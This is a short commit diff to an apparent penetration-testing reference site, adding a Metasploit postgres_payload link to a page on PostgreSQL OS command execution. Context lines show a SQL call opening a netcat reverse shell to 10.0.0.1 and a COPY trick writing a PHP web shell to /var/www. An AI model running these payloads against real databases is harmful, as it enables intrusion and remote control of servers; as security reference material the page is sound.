Add metasploit module ref for postgresql cmd exec

NetSPI · Mar 8, 2019 · dc0d9f6 · dc0d9f6
1 parent 499f367
commit dc0d9f6
Show file tree

Hide file tree

Showing 2 changed files with 14 additions and 2 deletions.
diff --git a/attackQueries/executingOSCommands/postgresql.html b/attackQueries/executingOSCommands/postgresql.html
@@ -81,7 +81,19 @@ <h3 id="executing-os-commands-through-sql-server">Executing OS Commands Through
 		SELECT sys('nc -e /bin/sh 10.0.0.1 4444');
 		<Br><Br>
 
-		Source: https://www.dionach.com/blog/postgresql-9x-remote-command-execution
+		Source: https://www.dionach.com/blog/postgresql-9x-remote-command-execution		
+      </td>
+    </tr>	
+    <tr >
+      <td valign="top">
+	  <br><br>  
+	  Metasploit postgres_payload Module<br>
+	  This can be used with direct connections.
+	  </td>
+	  <td valign="top">	
+	  <br><br>  
+	https://www.rapid7.com/db/modules/exploit/linux/postgres/postgres_payload<br>
+	exploit/linux/postgres/postgres_payload<br>
       </td>
     </tr>	
   </tbody>

diff --git a/attackQueries/readingAndWritingFiles/postgresql.html b/attackQueries/readingAndWritingFiles/postgresql.html
@@ -33,7 +33,7 @@ <h3 id="reading-and-writing-files">Reading and Writing Files</h3>
 		CREATE TABLE mytable (mycol text);<br>
 		INSERT INTO mytable(mycol) VALUES ('<? pasthru($_GET[cmd]); ?>');<br>
 		COPY mytable (mycol) TO '/var/www/test.php';<br>
-	  </td>
+	  </td>	
     </tr>	
   </tbody>
 </table>